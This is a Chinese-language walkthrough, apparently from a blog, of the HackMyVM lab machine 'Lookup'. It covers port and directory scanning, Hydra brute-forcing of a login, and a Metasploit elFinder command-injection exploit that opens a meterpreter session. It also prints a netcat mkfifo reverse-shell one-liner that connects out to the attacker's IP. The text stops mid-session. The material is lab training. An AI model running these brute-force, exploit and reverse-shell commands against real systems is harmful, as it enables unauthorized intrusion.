{"id":814,"date":"2024-09-23T19:07:47","date_gmt":"2024-09-23T11:07:47","guid":{"rendered":"http:\/\/162.14.82.114\/?p=814"},"modified":"2024-09-23T19:07:47","modified_gmt":"2024-09-23T11:07:47","slug":"hmv-_-lookup","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/814\/09\/23\/2024\/","title":{"rendered":"hmv[-_-]lookup"},"content":{"rendered":"<h1>Lookup<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906953.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906953.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923151238456\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906955.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906955.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923145634925\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ rustscan -a $IP -- -sCV            \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq\/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi\/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+\/gIThU4ODr\/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk\/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF\/gS3jP\/fVw+H6Eyz\/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL\/iO8JI5DrcvPDFlmqtX\/lzemir7W+WegC7hpoYpkPES6q+0\/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=\n|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG\/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/lookup.hmv\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.101\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 302) [Size: 0] [--&gt; http:\/\/lookup.hmv]\nProgress: 16555 \/ 441122 (3.75%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 16555 \/ 441122 (3.75%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u5904<code>dns<\/code>\u89e3\u6790\uff0c\u5c1d\u8bd5\u4fee\u6539\uff1a<\/p>\n<pre><code class=\"language-bash\">192.168.10.101    lookup.hmv<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ gobuster dir -u http:\/\/lookup.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/lookup.hmv\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 719]\n\/login.php            (Status: 200) [Size: 1]\nProgress: 106030 \/ 441122 (24.04%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 106234 \/ 441122 (24.08%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ whatweb http:\/\/lookup.hmv                     \nhttp:\/\/lookup.hmv [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.10.101], PasswordField[password], Title[Login Page]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906956.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906956.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923150112941\" \/><\/div><\/p>\n<p>\u5bc6\u7801\u8f93\u9519\u4f1a\u91cd\u5b9a\u5411\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u6293\u5305\uff1a<\/p>\n<pre><code class=\"language-bash\">POST \/login.php HTTP\/1.1\nHost: lookup.hmv\nContent-Length: 35\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/lookup.hmv\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/lookup.hmv\/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nusername=username&amp;password=password<\/code><\/pre>\n<p>\u5c1d\u8bd5sql\u6ce8\u5165\u4f46\u662f\u65e0\u679c\u3002<\/p>\n<h3>FUZZ \u57df\u540d<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ ffuf -c -u http:\/\/$IP -H &quot;Host: FUZZ.Lookup.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fs 0 \n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.10.101\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: FUZZ.Lookup.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\nwww                     [Status: 200, Size: 719, Words: 114, Lines: 27, Duration: 7ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 7142 req\/sec :: Duration: [0:00:05] :: Errors: 0 ::<\/code><\/pre>\n<p>\u6682\u65f6\u6ca1\u5565\u6536\u83b7\u3002<\/p>\n<h3>\u5c1d\u8bd5\u7206\u7834<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl -s -i http:\/\/lookup.hmv -X POST -d &quot;username=username&amp;password=password&quot; \nHTTP\/1.1 200 OK\nDate: Mon, 23 Sep 2024 07:21:13 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 719\nContent-Type: text\/html; charset=UTF-8\n\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n  &lt;meta charset=&quot;UTF-8&quot;&gt;\n  &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n  &lt;title&gt;Login Page&lt;\/title&gt;\n  &lt;link rel=&quot;stylesheet&quot; href=&quot;styles.css&quot;&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n  &lt;div class=&quot;container&quot;&gt;\n    &lt;form action=&quot;login.php&quot; method=&quot;post&quot;&gt;\n      &lt;h2&gt;Login&lt;\/h2&gt;\n      &lt;div class=&quot;input-group&quot;&gt;\n        &lt;label for=&quot;username&quot;&gt;Username&lt;\/label&gt;\n        &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; required&gt;\n      &lt;\/div&gt;\n      &lt;div class=&quot;input-group&quot;&gt;\n        &lt;label for=&quot;password&quot;&gt;Password&lt;\/label&gt;\n        &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; required&gt;\n      &lt;\/div&gt;\n      &lt;button type=&quot;submit&quot;&gt;Login&lt;\/button&gt;\n    &lt;\/form&gt;\n  &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl -s -i http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=username&amp;password=password&quot; \nHTTP\/1.1 200 OK\nDate: Mon, 23 Sep 2024 07:21:34 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nRefresh: 3; url=http:\/\/lookup.hmv\nVary: Accept-Encoding\nContent-Length: 74\nContent-Type: text\/html; charset=UTF-8\n\nWrong username or password. Please try again.&lt;br&gt;Redirecting in 3 seconds.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl -s http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=admin&amp;password=root&quot;\nWrong password. Please try again.&lt;br&gt;Redirecting in 3 seconds.<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>hydra<\/code>\u7206\u7834<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt -f lookup.hmv http-post-form &quot;\/login.php:username=^USER^&amp;password=^PASS^:Wrong password&quot; \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-23 05:37:07\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/lookup.hmv:80\/login.php:username=^USER^&amp;password=^PASS^:Wrong password\n[80][http-post-form] host: lookup.hmv   login: admin   password: password123\n[STATUS] attack finished for lookup.hmv (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-23 05:37:37<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53bb\u770b\u4e00\u4e0b\u8fd9\u4e2a\u5730\u5740\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=admin&amp;password=aaaa&quot;\nWrong password. Please try again.&lt;br&gt;Redirecting in 3 seconds.                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=admin&amp;password=password123&quot;\nWrong username or password. Please try again.&lt;br&gt;Redirecting in 3 seconds.<\/code><\/pre>\n<p>\u8bf4\u660e\u7528\u6237\u540d\u4e0d\u5bf9\uff0c\u91cd\u65b0\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ hydra -p password123 -L \/usr\/share\/wordlists\/rockyou.txt -f lookup.hmv http-post-form &quot;\/login.php:username=^USER^&amp;password=^PASS^:Wrong username&quot; \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-23 05:40:21\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399\/p:1), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/lookup.hmv:80\/login.php:username=^USER^&amp;password=^PASS^:Wrong username\n[STATUS] 4455.00 tries\/min, 4455 tries in 00:01h, 14339944 to do in 53:39h, 16 active\n[80][http-post-form] host: lookup.hmv   login: jose   password: password123\n[STATUS] attack finished for lookup.hmv (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-23 05:43:10<\/code><\/pre>\n<p>\u5f97\u5230\u7528\u6237\u540d\u548c\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-text\">jose\npassword123<\/code><\/pre>\n<p>\u6253\u5f00\u4f1a\u5f39\u5230\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/files.lookup.hmv\/<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u5229\u7528<\/h3>\n<p>\u4f46\u662f\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u5176\u4ed6\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906957.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906957.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175322323\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53f3\u952e\u4e0a\u4f20\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906958.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906958.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175611169\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906959.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906959.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175644736\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6539\u4e3a<code>jpg<\/code>\u4e0a\u4f20\u6210\u529f\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906960.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906960.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175839179\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u4ea7\u751f\u5229\u7528\u6f0f\u6d1e\u76f4\u63a5\u8fc7\u5427\uff0c\u5bb3\uff0c\u5176\u4ed6\u6f0f\u6d1e\u672a\u5229\u7528\u6210\u529f\uff0c\u5c1d\u8bd5msf\u7684\u6f0f\u6d1e\u6a21\u5757\uff1a<\/p>\n<pre><code class=\"language-bash\">\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ msfconsole -q                \nmsf6 &gt; search elfinder\n\nMatching Modules\n================\n\n   #  Name                                                               Disclosure Date  Rank       Check  Description\n   -  ----                                                               ---------------  ----       -----  -----------\n   0  exploit\/multi\/http\/builderengine_upload_exec                       2016-09-18       excellent  Yes    BuilderEngine Arbitrary File Upload Vulnerability and execution\n   1  exploit\/unix\/webapp\/tikiwiki_upload_exec                           2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability\n   2  exploit\/multi\/http\/wp_file_manager_rce                             2020-09-09       normal     Yes    WordPress File Manager Unauthenticated Remote Code Execution\n   3  exploit\/linux\/http\/elfinder_archive_cmd_injection                  2021-06-13       excellent  Yes    elFinder Archive Command Injection\n   4  exploit\/unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection\n\nInteract with a module by name or index. For example info 4, use 4 or use exploit\/unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection\n\nmsf6 &gt; use 4\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; options\n\nModule options (exploit\/unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/elFinder\/       yes       The base path to elFinder\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Auto\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; set LHOST 192.168.10.102\nLHOST =&gt; 192.168.10.102\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; set rhosts 192.168.10.101\nrhosts =&gt; 192.168.10.101\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; set vhost files.lookup.hmv\nvhost =&gt; files.lookup.hmv\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.102:4444 \n[*] Uploading payload &#039;cXiio3.jpg;echo 6370202e2e2f66696c65732f635869696f332e6a70672a6563686f2a202e527731696234352e706870 |xxd -r -p |sh&amp; #.jpg&#039; (1955 bytes)\n[*] Triggering vulnerability via image rotation ...\n[*] Executing payload (\/elFinder\/php\/.Rw1ib45.php) ...\n[*] Sending stage (39927 bytes) to 192.168.10.101\n[+] Deleted .Rw1ib45.php\n[*] Meterpreter session 1 opened (192.168.10.102:4444 -&gt; 192.168.10.101:54334) at 2024-09-23 06:02:47 -0400\n[*] No reply\n[*] Removing uploaded file ...\n[+] Deleted uploaded file\n\nmeterpreter &gt; shell\nProcess 6973 created.\nChannel 0 created.\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)<\/code><\/pre>\n<p>\u62ff\u4e0bshell\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2&gt;&amp;1|nc 192.168.10.102 1234 &gt;\/tmp\/f<\/code><\/pre>\n<p>\u4f20\u5230pwncat\u8fd9\u91cc\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906961.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906961.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923180820216\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) 